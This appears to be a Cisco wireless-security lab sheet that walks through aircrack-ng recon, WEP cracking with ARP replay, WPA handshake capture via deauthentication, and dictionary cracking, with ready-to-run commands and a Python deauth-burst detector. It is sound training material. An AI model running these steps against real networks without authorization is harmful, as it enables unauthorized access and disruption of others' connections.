Hacking Wireless Networks

IMPORTANT!: Gaining access to networks without permission is considered an illegal act or crime in most countries. Know the law and obey.

Aircrack-ng http://www.aircrack-ng.org/ is a set of tools for auditing wireless networks. The goal of these exercises is to introduce some of their capabilities. The man pages are very thorough and are more than enough to complete the exercises without “cheating”. You are encouraged to find the solutions in the man pages. Please pay attention to the large variety of features the toolset offers as we will only be able to cover a tiny fraction.

You will need to be root to use most of these utilities.

Exercise 1: Recon

Task 1

Use airodump-ng to find our targets’ BSSIDs, channels, and security settings given their ESSIDs: seccon_wep and seccon_wpa. Make note of these details; you will need them later. Stop the process when you are done.

In order to sniff a wireless network, the adapter needs to be put into monitor mode. Some processes may interfere with the adapter while in monitor mode.

Airmon Check
    airmon-ng check

This lists the processes that may interfere. In normal testing it is best to kill them, but do not kill any processes for this lab (e.g. dhclient and wpa_supplicant).

Killing conflicting processes
    airmon-ng check kill

This command would kill potentially interfering processes, but don’t use it for this lab.

Put the wireless interface wlan0 in monitor mode. A new interface, wlan0mon, will be created. Correct any errors that airmon-ng reports.

Configuring the wireless interface wlan0 in monitor mode
    airmon-ng start wlan0

Use airodump-ng, filtering on the two target ESSIDs.

Using airodump-ng
    airodump-ng --essid seccon_wep --essid seccon_wpa wlan0mon

Exercise 2: Cracking WEP

Task 1

Run airodump-ng to start capturing packets on the target network utilizing WEP. Let this capture continue.

Cheat:
    # --write produces $output_cap_file-01.cap
    airodump-ng --write $output_cap_file --channel $target_channel --bssid $target_bssid wlan0mon

Task 2

Use aircrack-ng’s PTW (Pyshkin, Tews, Weinmann) method to crack the WEP PSK.

Cheat:
    # -a 1 specifies we are cracking WEP
    # $capture_file is the -01.cap file written by airodump-ng in Task 1
    aircrack-ng -a 1 [-b $target_bssid] $capture_file

Task 3

Anywhere from 20k to 60k IVs will be needed. Use aireplay-ng to spoof an associated station and replay ARP frames to increase the data rate.

Cheat:
    # -3 indicates replay ARP frames
    aireplay-ng -3 -b $target_bssid -h $spoofed_station_mac wlan0mon

Exercise 3: Obtaining the WPAv2 PSK

Task 1

Use airodump-ng to capture a WPA handshake corresponding to a target network.

Cheat:
    # Wait until "WPA handshake" appears in the top line.
    airodump-ng --write $output_cap_file --channel $target_channel --bssid $target_bssid wlan0mon

Task 2

If the handshake doesn’t reveal itself passively, use aireplay-ng to deauthenticate an associated station. When the station reconnects, a new 4-way handshake occurs and can be captured.

Cheat:
    # -0 1 indicates send one set of deauth packets
    aireplay-ng -0 1 -a $target_bssid -c $authed_station_mac wlan0mon
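The deauthentication used in Task 2 is also what a wireless IDS watches for. As an added example (not part of the lab or the aircrack-ng suite), this Python parses raw 802.11 management frames and flags any sender that emits a burst of deauth/disassoc frames on a BSSID; the sample frames, the reason code 7 and the threshold of 10 are constructed assumptions, not values taken from a real capture.

```python
import struct
from collections import Counter

DEAUTH, DISASSOC, BEACON = 12, 10, 8  # 802.11 management frame subtypes

def build_mgmt_frame(subtype, da, sa, bssid, body=b"", seq=0):
    """Build a minimal 802.11 management frame (no radiotap header) as test input."""
    fc = struct.pack("<H", subtype << 4)            # version 0, type 0 (management)
    return fc + struct.pack("<H", 0) + da + sa + bssid + struct.pack("<H", seq << 4) + body

def parse_mgmt_frame(frame):
    """Return (subtype, da, sa, bssid, body) for a management frame, else None."""
    if len(frame) < 24:
        return None
    fc = struct.unpack_from("<H", frame, 0)[0]
    if fc & 0x0F != 0:                               # low nibble: version 0 and type 0 (mgmt)
        return None
    return (fc >> 4) & 0x0F, frame[4:10], frame[10:16], frame[16:22], frame[24:]

def count_deauths(frames):
    """Count deauth/disassoc frames keyed by (sender MAC, BSSID, reason code)."""
    counts = Counter()
    for frame in frames:
        parsed = parse_mgmt_frame(frame)
        if parsed is None or parsed[0] not in (DEAUTH, DISASSOC):
            continue
        _subtype, _da, sa, bssid, body = parsed
        reason = struct.unpack_from("<H", body, 0)[0] if len(body) >= 2 else None
        counts[(sa.hex(":"), bssid.hex(":"), reason)] += 1
    return counts

def deauth_alerts(frames, threshold=10):
    """Senders that reached `threshold` deauth/disassoc frames within this batch."""
    return sorted((sa, bssid, reason, n)
                  for (sa, bssid, reason), n in count_deauths(frames).items() if n >= threshold)

# Constructed sample batch (not a real capture): one beacon, then a burst of directed
# deauth frames carrying the AP's address towards one client, as an injection tool would send.
AP, STA, BCAST = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb"), b"\xff" * 6
REASON = struct.pack("<H", 7)                        # assumed reason code for the sample only
SAMPLE_FRAMES = [build_mgmt_frame(BEACON, BCAST, AP, AP)]
SAMPLE_FRAMES += [build_mgmt_frame(DEAUTH, STA, AP, AP, REASON, seq=i) for i in range(12)]
SAMPLE_FRAMES += [build_mgmt_frame(DEAUTH, AP, STA, AP, REASON, seq=i) for i in range(3)]

if __name__ == "__main__":
    for sa, bssid, reason, n in deauth_alerts(SAMPLE_FRAMES):
        print(f"ALERT: {n} deauth/disassoc frames from {sa} on BSSID {bssid} (reason {reason})")
```

On a real sensor the batch would be a sliding time window of frames read from a monitor-mode capture, and the legitimate AP's own sparse deauths stay below the threshold.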

Task 3

Use aircrack-ng to find the WPA PSK using the dictionary /usr/share/wordlists/fasttrack.txt.

Cheat:
    # -a 2 specifies we are cracking a WPA handshake
    aircrack-ng -a 2 [-b $target_bssid] -w /usr/share/wordlists/fasttrack.txt $handshake_capture_file
© Copyright Cisco Systems